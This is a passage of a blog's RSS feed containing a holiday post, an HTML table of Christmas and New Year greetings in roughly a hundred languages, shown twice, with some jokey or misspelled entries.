<tr>
<td valign="top">Brazilian:</td>
<td valign="top">Boas Festas e Feliz Ano Novo</td>
</tr>
<tr>
<td valign="top">Breton:</td>
<td valign="top">Nedeleg laouen na bloavezh mat</td>
</tr>
<tr>
<td valign="top">Bulgarian:</td>
<td valign="top">Tchestita Koleda; Tchestito Rojdestvo Hristovo</td>
</tr>
<tr>
<td valign="top">Catalan:</td>
<td valign="top">Bon Nadal i un Bon Any Nou!</td>
</tr>
<tr>
<td valign="top">Chile:</td>
<td valign="top">Feliz Navidad</td>
</tr>
<tr>
<td valign="top">Chinese: (Cantonese)</td>
<td valign="top">Gun Tso Sun Tan'Gung Haw Sun</td>
</tr>
<tr>
<td valign="top">Chinese: (Mandarin)</td>
<td valign="top">Kung His Hsin Nien bing Chu Shen Tan</td>
</tr>
<tr>
<td valign="top">Choctaw:</td>
<td valign="top">Yukpa, Nitak Hollo Chito</td>
</tr>
<tr>
<td valign="top">Columbia:</td>
<td valign="top">Feliz Navidad y Próspero Año Nuevo</td>
</tr>
<tr>
<td valign="top">Cornish:</td>
<td valign="top">Nadelik looan na looan blethen noweth</td>
</tr>
<tr>
<td valign="top">Corsian:</td>
<td valign="top">Pace e salute</td>
</tr>
<tr>
<td valign="top">Crazanian:</td>
<td valign="top">Rot Yikji Dol La Roo</td>
</tr>
<tr>
<td valign="top">Cree:</td>
<td valign="top">Mitho Makosi Kesikansi</td>
</tr>
<tr>
<td valign="top">Croatian:</td>
<td valign="top">Sretan Bozic</td>
</tr>
<tr>
<td valign="top">Czech:</td>
<td valign="top">Prejeme Vam Vesele Vanoce a stastny Novy Rok</td>
</tr>
<tr>
<td valign="top">Danish:</td>
<td valign="top">Glædelig Jul</td>
</tr>
<tr>
<td valign="top">Duri:</td>
<td valign="top">Christmas-e- Shoma Mobarak</td>
</tr>
<tr>
<td valign="top">Dutch:</td>
<td valign="top">Vrolijk Kerstfeest en een Gelukkig Nieuwjaar! or             Zalig Kerstfeast</td>
</tr>
<tr>
<td valign="top">English:</td>
<td valign="top">Merry Christmas</td>
</tr>
<tr>
<td valign="top">Eskimo: (inupik)</td>
<td valign="top">Jutdlime pivdluarit ukiortame pivdluaritlo!</td>
</tr>
<tr>
<td valign="top">Esperanto:</td>
<td valign="top">Gajan Kristnaskon</td>
</tr>
<tr>
<td valign="top">Estonian:</td>
<td valign="top">Ruumsaid juulup&#124;hi</td>
</tr>
<tr>
<td valign="top">Faeroese:</td>
<td valign="top">Gledhilig jol og eydnurikt nyggjar!</td>
</tr>
<tr>
<td valign="top">Farsi:</td>
<td valign="top">Cristmas-e-shoma mobarak bashad</td>
</tr>
<tr>
<td valign="top">Finnish:</td>
<td valign="top">Hyvaa joulua</td>
</tr>
<tr>
<td valign="top">Flemish:</td>
<td valign="top">Zalig Kerstfeest en Gelukkig nieuw jaar</td>
</tr>
<tr>
<td valign="top">French:</td>
<td valign="top">Joyeux Noel</td>
</tr>
<tr>
<td valign="top">Frisian:</td>
<td valign="top">Noflike Krystdagen en in protte Lok en Seine yn it             Nije Jier!</td>
</tr>
<tr>
<td valign="top">Galician:</td>
<td valign="top">Bo Nada</td>
</tr>
<tr>
<td valign="top">Gaelic:</td>
<td valign="top">Nollaig chridheil agus Bliadhna mhath ùr!</td>
</tr>
<tr>
<td valign="top">German:</td>
<td valign="top">Froehliche Weihnachten</td>
</tr>
<tr>
<td valign="top">Greek:</td>
<td valign="top">Kala Christouyenna!</td>
</tr>
<tr>
<td valign="top">Hausa:</td>
<td valign="top">Barka da Kirsimatikuma Barka da Sabuwar Shekara!</td>
</tr>
<tr>
<td valign="top">Hawaiian:</td>
<td valign="top">Mele Kalikimaka</td>
</tr>
<tr>
<td valign="top">Hebrew:</td>
<td valign="top">Mo'adim Lesimkha. Chena tova</td>
</tr>
<tr>
<td valign="top">Hindi:</td>
<td valign="top">Shub Naya Baras</td>
</tr>
<tr>
<td valign="top">Hausa:</td>
<td valign="top">Barka da Kirsimatikuma Barka da Sabuwar Shekara!</td>
</tr>
<tr>
<td valign="top">Hawaian:</td>
<td valign="top">Mele Kalikimaka ame Hauoli Makahiki Hou!</td>
</tr>
<tr>
<td valign="top">Hungarian:</td>
<td valign="top">Kellemes Karacsonyi unnepeket</td>
</tr>
<tr>
<td valign="top">Icelandic:</td>
<td valign="top">Gledileg Jol</td>
</tr>
<tr>
<td valign="top">Indonesian:</td>
<td valign="top">Selamat Hari Natal</td>
</tr>
<tr>
<td valign="top">Iraqi:</td>
<td valign="top">Idah Saidan Wa Sanah Jadidah</td>
</tr>
<tr>
<td valign="top">Irish:</td>
<td valign="top">Nollaig Shona Dhuit or Nodlaig mhaith chugnat</td>
</tr>
<tr>
<td valign="top">Iroquois:</td>
<td valign="top">Ojenyunyat Sungwiyadeson honungradon nagwutut.             Ojenyunyat osrasay.</td>
</tr>
<tr>
<td valign="top">Italian:</td>
<td valign="top">Buone Feste Natalizie</td>
</tr>
<tr>
<td valign="top">Japanese:</td>
<td valign="top">Shinnen omedeto. Kurisumasu Omedeto</td>
</tr>
<tr>
<td valign="top">Jiberish:</td>
<td valign="top">Mithag Crithagsigathmithags</td>
</tr>
<tr>
<td valign="top">Korean:</td>
<td valign="top">Sung Tan Chuk Ha</td>
</tr>
<tr>
<td valign="top">Latin:</td>
<td valign="top">Natale hilare et Annum Faustum!</td>
</tr>
<tr>
<td valign="top">Latvian:</td>
<td valign="top">Prieci'gus Ziemsve'tkus un Laimi'gu Jauno Gadu!</td>
</tr>
<tr>
<td valign="top">Lausitzian:</td>
<td valign="top">Wjesole hody a strowe nowe leto</td>
</tr>
<tr>
<td valign="top">Lettish:</td>
<td valign="top">Priecigus Ziemassvetkus</td>
</tr>
<tr>
<td valign="top">Lithuanian:</td>
<td valign="top">Linksmu Kaledu</td>
</tr>
<tr>
<td valign="top">Low Saxon:</td>
<td valign="top">Heughliche Winachten un 'n moi Nijaar</td>
</tr>
<tr>
<td valign="top">Macedonian:</td>
<td valign="top">Sreken Bozhik</td>
</tr>
<tr>
<td valign="top">Maltese:</td>
<td valign="top">IL-Milied It-tajjeb</td>
</tr>
<tr>
<td valign="top">Manx:</td>
<td valign="top">Nollick ghennal as blein vie noa</td>
</tr>
<tr>
<td valign="top">Maori:</td>
<td valign="top">Meri Kirihimete</td>
</tr>
<tr>
<td valign="top">Marathi:</td>
<td valign="top">Shub Naya Varsh</td>
</tr>
<tr>
<td valign="top">Navajo:</td>
<td valign="top">Merry Keshmish</td>
</tr>
<tr>
<td valign="top">Norwegian:</td>
<td valign="top">God Jul or Gledelig Jul</td>
</tr>
<tr>
<td valign="top">Occitan:</td>
<td valign="top">Pulit nadal e bona annado</td>
</tr>
<tr>
<td valign="top">Papiamento:</td>
<td valign="top">Bon Pasco</td>
</tr>
<tr>
<td valign="top">Papua New Guinea:</td>
<td valign="top">Bikpela hamamas blong dispela Krismas na Nupela             yia i go long yu</td>
</tr>
<tr>
<td valign="top">Pennsylvania German:</td>
<td valign="top">En frehlicher Grischtdaag un en hallich Nei Yaahr!</td>
</tr>
<tr>
<td valign="top">Peru:</td>
<td valign="top">Feliz Navidad y un Venturoso Año Nuevo</td>
</tr>
<tr>
<td valign="top">Philipines:</td>
<td valign="top">Maligayan Pasko!</td>
</tr>
<tr>
<td valign="top">Polish:</td>
<td valign="top">Wesolych Swiat Bozego Narodzenia or Boze             Narodzenie</td>
</tr>
<tr>
<td valign="top">Portuguese:</td>
<td valign="top">Feliz Natal</td>
</tr>
<tr>
<td valign="top">Pushto:</td>
<td valign="top">Christmas Aao Ne-way Kaal Mo Mobarak Sha</td>
</tr>
<tr>
<td valign="top">Rapa-Nui (Easter Island):</td>
<td valign="top">Mata-Ki-Te-Rangi. Te-Pito-O-Te-Henua</td>
</tr>
<tr>
<td valign="top">Rhetian:</td>
<td valign="top">Bellas festas da nadal e bun onn</td>
</tr>
<tr>
<td valign="top">Romanche (sursilvan dialect):</td>
<td valign="top">Legreivlas fiastas da Nadal e bien niev onn!</td>
</tr>
<tr>
<td valign="top">Rumanian:</td>
<td valign="top">Sarbatori vesele</td>
</tr>
<tr>
<td valign="top">Russian:</td>
<td valign="top">Pozdrevlyayu s prazdnikom Rozhdestva is Novim             Godom</td>
</tr>
<tr>
<td valign="top">Sami:</td>
<td valign="top">Buorrit Juovllat</td>
</tr>
<tr>
<td valign="top">Samoan:</td>
<td valign="top">La Maunia Le Kilisimasi Ma Le Tausaga Fou</td>
</tr>
<tr>
<td valign="top">Sardinian:</td>
<td valign="top">Bonu nadale e prosperu annu nou</td>
</tr>
<tr>
<td valign="top">Serbian:</td>
<td valign="top">Hristos se rodi</td>
</tr>
<tr>
<td valign="top">Slovakian:</td>
<td valign="top">Sretan Bozic or Vesele vianoce</td>
</tr>
<tr>
<td valign="top">Sami:</td>
<td valign="top">Buorrit Juovllat</td>
</tr>
<tr>
<td valign="top">Samoan:</td>
<td valign="top">La Maunia Le Kilisimasi Ma Le Tausaga Fou</td>
</tr>
<tr>
<td valign="top">Scots Gaelic:</td>
<td valign="top">Nollaig chridheil huibh</td>
</tr>
<tr>
<td valign="top">Serb-Croatian:</td>
<td valign="top">Sretam Bozic. Vesela Nova Godina</td>
</tr>
<tr>
<td valign="top">Serbian:</td>
<td valign="top">Hristos se rodi.</td>
</tr>
<tr>
<td valign="top">Singhalese:</td>
<td valign="top">Subha nath thalak Vewa. Subha Aluth Awrudhak Vewa</td>
</tr>
<tr>
<td valign="top">Slovak:</td>
<td valign="top">Vesele Vianoce. A stastlivy Novy Rok</td>
</tr>
<tr>
<td valign="top">Slovene:</td>
<td valign="top">Vesele Bozicne. Screcno Novo Leto</td>
</tr>
<tr>
<td valign="top">Spanish:</td>
<td valign="top">Feliz Navidad</td>
</tr>
<tr>
<td valign="top">Swedish:</td>
<td valign="top">God Jul and (Och) Ett Gott Nytt År</td>
</tr>
<tr>
<td valign="top">Tagalog:</td>
<td valign="top">Maligayamg Pasko. Masaganang Bagong Taon</td>
</tr>
<tr>
<td valign="top">Tami:</td>
<td valign="top">Nathar Puthu Varuda Valthukkal</td>
</tr>
<tr>
<td valign="top">Trukeese:</td>
<td valign="top">(Micronesian) Neekiriisimas annim oo iyer seefe             feyiyeech!</td>
</tr>
<tr>
<td valign="top">Thai:</td>
<td valign="top">Sawadee Pee Mai</td>
</tr>
<tr>
<td valign="top">Turkish:</td>
<td valign="top">Noeliniz Ve Yeni Yiliniz Kutlu Olsun</td>
</tr>
<tr>
<td valign="top">Ukrainian:</td>
<td valign="top">Srozhdestvom Kristovym</td>
</tr>
<tr>
<td valign="top">Urdu:</td>
<td valign="top">Naya Saal Mubarak Ho</td>
</tr>
<tr>
<td valign="top">Vietnamese:</td>
<td valign="top">Chung Mung Giang Sinh</td>
</tr>
<tr>
<td valign="top">Welsh:</td>
<td valign="top">Nadolig Llawen</td>
</tr>
<tr>
<td valign="top">Yugoslavian:</td>
<td valign="top">Cestitamo Bozic</td>
</tr>
<tr>
<td valign="top">Yoruba:</td>
<td valign="top">E ku odun, e ku iye'dun!</td>
</tr>
</table>]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>Localization:<br />
<span id="more-110"></span></p>
<table align="center" width="75%">
<tr>
<td width="150">Afrikaans</td>
<td>Gesëende Kersfees</td>
</tr>
<tr>
<td>Afrikander</td>
<td>Een Plesierige Kerfees</td>
</tr>
<tr>
<td valign="top">African/ Eritrean/ Tigrinja</td>
<td valign="top">Rehus-Beal-Ledeats</td>
</tr>
<tr>
<td valign="top">Albanian</td>
<td valign="top">Gezur Krislinjden</td>
</tr>
<tr>
<td valign="top">Arabic:</td>
<td valign="top">Idah Saidan Wa Sanah Jadidah</td>
</tr>
<tr>
<td valign="top">Argentine:</td>
<td valign="top">Feliz Navidad</td>
</tr>
<tr>
<td valign="top">Armenian:</td>
<td valign="top">Shenoraavor Nor Dari yev Pari Gaghand</td>
</tr>
<tr>
<td valign="top">Azeri:</td>
<td valign="top">Tezze Iliniz Yahsi Olsun</td>
</tr>
<tr>
<td valign="top">Bahasa Malaysia:</td>
<td valign="top">Selamat Hari Natal</td>
</tr>
<tr>
<td valign="top">Basque:</td>
<td valign="top">Zorionak eta Urte Berri On!</td>
</tr>
<tr>
<td valign="top">Bengali:</td>
<td valign="top">Shuvo Naba Barsha</td>
</tr>
<tr>
<td valign="top">Bohemian:</td>
<td valign="top">Vesele Vanoce</td>
</tr>
<tr>
<td valign="top">Brazilian:</td>
<td valign="top">Boas Festas e Feliz Ano Novo</td>
</tr>
<tr>
<td valign="top">Breton:</td>
<td valign="top">Nedeleg laouen na bloavezh mat</td>
</tr>
<tr>
<td valign="top">Bulgarian:</td>
<td valign="top">Tchestita Koleda; Tchestito Rojdestvo Hristovo</td>
</tr>
<tr>
<td valign="top">Catalan:</td>
<td valign="top">Bon Nadal i un Bon Any Nou!</td>
</tr>
<tr>
<td valign="top">Chile:</td>
<td valign="top">Feliz Navidad</td>
</tr>
<tr>
<td valign="top">Chinese: (Cantonese)</td>
<td valign="top">Gun Tso Sun Tan&#8217;Gung Haw Sun</td>
</tr>
<tr>
<td valign="top">Chinese: (Mandarin)</td>
<td valign="top">Kung His Hsin Nien bing Chu Shen Tan</td>
</tr>
<tr>
<td valign="top">Choctaw:</td>
<td valign="top">Yukpa, Nitak Hollo Chito</td>
</tr>
<tr>
<td valign="top">Columbia:</td>
<td valign="top">Feliz Navidad y Próspero Año Nuevo</td>
</tr>
<tr>
<td valign="top">Cornish:</td>
<td valign="top">Nadelik looan na looan blethen noweth</td>
</tr>
<tr>
<td valign="top">Corsian:</td>
<td valign="top">Pace e salute</td>
</tr>
<tr>
<td valign="top">Crazanian:</td>
<td valign="top">Rot Yikji Dol La Roo</td>
</tr>
<tr>
<td valign="top">Cree:</td>
<td valign="top">Mitho Makosi Kesikansi</td>
</tr>
<tr>
<td valign="top">Croatian:</td>
<td valign="top">Sretan Bozic</td>
</tr>
<tr>
<td valign="top">Czech:</td>
<td valign="top">Prejeme Vam Vesele Vanoce a stastny Novy Rok</td>
</tr>
<tr>
<td valign="top">Danish:</td>
<td valign="top">Glædelig Jul</td>
</tr>
<tr>
<td valign="top">Duri:</td>
<td valign="top">Christmas-e- Shoma Mobarak</td>
</tr>
<tr>
<td valign="top">Dutch:</td>
<td valign="top">Vrolijk Kerstfeest en een Gelukkig Nieuwjaar! or Zalig Kerstfeast</td>
</tr>
<tr>
<td valign="top">English:</td>
<td valign="top">Merry Christmas</td>
</tr>
<tr>
<td valign="top">Eskimo: (inupik)</td>
<td valign="top">Jutdlime pivdluarit ukiortame pivdluaritlo!</td>
</tr>
<tr>
<td valign="top">Esperanto:</td>
<td valign="top">Gajan Kristnaskon</td>
</tr>
<tr>
<td valign="top">Estonian:</td>
<td valign="top">Ruumsaid juulup|hi</td>
</tr>
<tr>
<td valign="top">Faeroese:</td>
<td valign="top">Gledhilig jol og eydnurikt nyggjar!</td>
</tr>
<tr>
<td valign="top">Farsi:</td>
<td valign="top">Cristmas-e-shoma mobarak bashad</td>
</tr>
<tr>
<td valign="top">Finnish:</td>
<td valign="top">Hyvaa joulua</td>
</tr>
<tr>
<td valign="top">Flemish:</td>
<td valign="top">Zalig Kerstfeest en Gelukkig nieuw jaar</td>
</tr>
<tr>
<td valign="top">French:</td>
<td valign="top">Joyeux Noel</td>
</tr>
<tr>
<td valign="top">Frisian:</td>
<td valign="top">Noflike Krystdagen en in protte Lok en Seine yn it Nije Jier!</td>
</tr>
<tr>
<td valign="top">Galician:</td>
<td valign="top">Bo Nada</td>
</tr>
<tr>
<td valign="top">Gaelic:</td>
<td valign="top">Nollaig chridheil agus Bliadhna mhath ùr!</td>
</tr>
<tr>
<td valign="top">German:</td>
<td valign="top">Froehliche Weihnachten</td>
</tr>
<tr>
<td valign="top">Greek:</td>
<td valign="top">Kala Christouyenna!</td>
</tr>
<tr>
<td valign="top">Hausa:</td>
<td valign="top">Barka da Kirsimatikuma Barka da Sabuwar Shekara!</td>
</tr>
<tr>
<td valign="top">Hawaiian:</td>
<td valign="top">Mele Kalikimaka</td>
</tr>
<tr>
<td valign="top">Hebrew:</td>
<td valign="top">Mo&#8217;adim Lesimkha. Chena tova</td>
</tr>
<tr>
<td valign="top">Hindi:</td>
<td valign="top">Shub Naya Baras</td>
</tr>
<tr>
<td valign="top">Hausa:</td>
<td valign="top">Barka da Kirsimatikuma Barka da Sabuwar Shekara!</td>
</tr>
<tr>
<td valign="top">Hawaian:</td>
<td valign="top">Mele Kalikimaka ame Hauoli Makahiki Hou!</td>
</tr>
<tr>
<td valign="top">Hungarian:</td>
<td valign="top">Kellemes Karacsonyi unnepeket</td>
</tr>
<tr>
<td valign="top">Icelandic:</td>
<td valign="top">Gledileg Jol</td>
</tr>
<tr>
<td valign="top">Indonesian:</td>
<td valign="top">Selamat Hari Natal</td>
</tr>
<tr>
<td valign="top">Iraqi:</td>
<td valign="top">Idah Saidan Wa Sanah Jadidah</td>
</tr>
<tr>
<td valign="top">Irish:</td>
<td valign="top">Nollaig Shona Dhuit or Nodlaig mhaith chugnat</td>
</tr>
<tr>
<td valign="top">Iroquois:</td>
<td valign="top">Ojenyunyat Sungwiyadeson honungradon nagwutut. Ojenyunyat osrasay.</td>
</tr>
<tr>
<td valign="top">Italian:</td>
<td valign="top">Buone Feste Natalizie</td>
</tr>
<tr>
<td valign="top">Japanese:</td>
<td valign="top">Shinnen omedeto. Kurisumasu Omedeto</td>
</tr>
<tr>
<td valign="top">Jiberish:</td>
<td valign="top">Mithag Crithagsigathmithags</td>
</tr>
<tr>
<td valign="top">Korean:</td>
<td valign="top">Sung Tan Chuk Ha</td>
</tr>
<tr>
<td valign="top">Latin:</td>
<td valign="top">Natale hilare et Annum Faustum!</td>
</tr>
<tr>
<td valign="top">Latvian:</td>
<td valign="top">Prieci&#8217;gus Ziemsve&#8217;tkus un Laimi&#8217;gu Jauno Gadu!</td>
</tr>
<tr>
<td valign="top">Lausitzian:</td>
<td valign="top">Wjesole hody a strowe nowe leto</td>
</tr>
<tr>
<td valign="top">Lettish:</td>
<td valign="top">Priecigus Ziemassvetkus</td>
</tr>
<tr>
<td valign="top">Lithuanian:</td>
<td valign="top">Linksmu Kaledu</td>
</tr>
<tr>
<td valign="top">Low Saxon:</td>
<td valign="top">Heughliche Winachten un &#8216;n moi Nijaar</td>
</tr>
<tr>
<td valign="top">Macedonian:</td>
<td valign="top">Sreken Bozhik</td>
</tr>
<tr>
<td valign="top">Maltese:</td>
<td valign="top">IL-Milied It-tajjeb</td>
</tr>
<tr>
<td valign="top">Manx:</td>
<td valign="top">Nollick ghennal as blein vie noa</td>
</tr>
<tr>
<td valign="top">Maori:</td>
<td valign="top">Meri Kirihimete</td>
</tr>
<tr>
<td valign="top">Marathi:</td>
<td valign="top">Shub Naya Varsh</td>
</tr>
<tr>
<td valign="top">Navajo:</td>
<td valign="top">Merry Keshmish</td>
</tr>
<tr>
<td valign="top">Norwegian:</td>
<td valign="top">God Jul or Gledelig Jul</td>
</tr>
<tr>
<td valign="top">Occitan:</td>
<td valign="top">Pulit nadal e bona annado</td>
</tr>
<tr>
<td valign="top">Papiamento:</td>
<td valign="top">Bon Pasco</td>
</tr>
<tr>
<td valign="top">Papua New Guinea:</td>
<td valign="top">Bikpela hamamas blong dispela Krismas na Nupela yia i go long yu</td>
</tr>
<tr>
<td valign="top">Pennsylvania German:</td>
<td valign="top">En frehlicher Grischtdaag un en hallich Nei Yaahr!</td>
</tr>
<tr>
<td valign="top">Peru:</td>
<td valign="top">Feliz Navidad y un Venturoso Año Nuevo</td>
</tr>
<tr>
<td valign="top">Philipines:</td>
<td valign="top">Maligayan Pasko!</td>
</tr>
<tr>
<td valign="top">Polish:</td>
<td valign="top">Wesolych Swiat Bozego Narodzenia or Boze Narodzenie</td>
</tr>
<tr>
<td valign="top">Portuguese:</td>
<td valign="top">Feliz Natal</td>
</tr>
<tr>
<td valign="top">Pushto:</td>
<td valign="top">Christmas Aao Ne-way Kaal Mo Mobarak Sha</td>
</tr>
<tr>
<td valign="top">Rapa-Nui (Easter Island):</td>
<td valign="top">Mata-Ki-Te-Rangi. Te-Pito-O-Te-Henua</td>
</tr>
<tr>
<td valign="top">Rhetian:</td>
<td valign="top">Bellas festas da nadal e bun onn</td>
</tr>
<tr>
<td valign="top">Romanche (sursilvan dialect):</td>
<td valign="top">Legreivlas fiastas da Nadal e bien niev onn!</td>
</tr>
<tr>
<td valign="top">Rumanian:</td>
<td valign="top">Sarbatori vesele</td>
</tr>
<tr>
<td valign="top">Russian:</td>
<td valign="top">Pozdrevlyayu s prazdnikom Rozhdestva is Novim Godom</td>
</tr>
<tr>
<td valign="top">Sami:</td>
<td valign="top">Buorrit Juovllat</td>
</tr>
<tr>
<td valign="top">Samoan:</td>
<td valign="top">La Maunia Le Kilisimasi Ma Le Tausaga Fou</td>
</tr>
<tr>
<td valign="top">Sardinian:</td>
<td valign="top">Bonu nadale e prosperu annu nou</td>
</tr>
<tr>
<td valign="top">Serbian:</td>
<td valign="top">Hristos se rodi</td>
</tr>
<tr>
<td valign="top">Slovakian:</td>
<td valign="top">Sretan Bozic or Vesele vianoce</td>
</tr>
<tr>
<td valign="top">Sami:</td>
<td valign="top">Buorrit Juovllat</td>
</tr>
<tr>
<td valign="top">Samoan:</td>
<td valign="top">La Maunia Le Kilisimasi Ma Le Tausaga Fou</td>
</tr>
<tr>
<td valign="top">Scots Gaelic:</td>
<td valign="top">Nollaig chridheil huibh</td>
</tr>
<tr>
<td valign="top">Serb-Croatian:</td>
<td valign="top">Sretam Bozic. Vesela Nova Godina</td>
</tr>
<tr>
<td valign="top">Serbian:</td>
<td valign="top">Hristos se rodi.</td>
</tr>
<tr>
<td valign="top">Singhalese:</td>
<td valign="top">Subha nath thalak Vewa. Subha Aluth Awrudhak Vewa</td>
</tr>
<tr>
<td valign="top">Slovak:</td>
<td valign="top">Vesele Vianoce. A stastlivy Novy Rok</td>
</tr>
<tr>
<td valign="top">Slovene:</td>
<td valign="top">Vesele Bozicne. Screcno Novo Leto</td>
</tr>
<tr>
<td valign="top">Spanish:</td>
<td valign="top">Feliz Navidad</td>
</tr>
<tr>
<td valign="top">Swedish:</td>
<td valign="top">God Jul and (Och) Ett Gott Nytt År</td>
</tr>
<tr>
<td valign="top">Tagalog:</td>
<td valign="top">Maligayamg Pasko. Masaganang Bagong Taon</td>
</tr>
<tr>
<td valign="top">Tami:</td>
<td valign="top">Nathar Puthu Varuda Valthukkal</td>
</tr>
<tr>
<td valign="top">Trukeese:</td>
<td valign="top">(Micronesian) Neekiriisimas annim oo iyer seefe feyiyeech!</td>
</tr>
<tr>
<td valign="top">Thai:</td>
<td valign="top">Sawadee Pee Mai</td>
</tr>
<tr>
<td valign="top">Turkish:</td>
<td valign="top">Noeliniz Ve Yeni Yiliniz Kutlu Olsun</td>
</tr>
<tr>
<td valign="top">Ukrainian:</td>
<td valign="top">Srozhdestvom Kristovym</td>
</tr>
<tr>
<td valign="top">Urdu:</td>
<td valign="top">Naya Saal Mubarak Ho</td>
</tr>
<tr>
<td valign="top">Vietnamese:</td>
<td valign="top">Chung Mung Giang Sinh</td>
</tr>
<tr>
<td valign="top">Welsh:</td>
<td valign="top">Nadolig Llawen</td>
</tr>
<tr>
<td valign="top">Yugoslavian:</td>
<td valign="top">Cestitamo Bozic</td>
</tr>
<tr>
<td valign="top">Yoruba:</td>
<td valign="top">E ku odun, e ku iye&#8217;dun!</td>
</tr>
</table>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/ranting/merry-christmas-happy-holidays/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
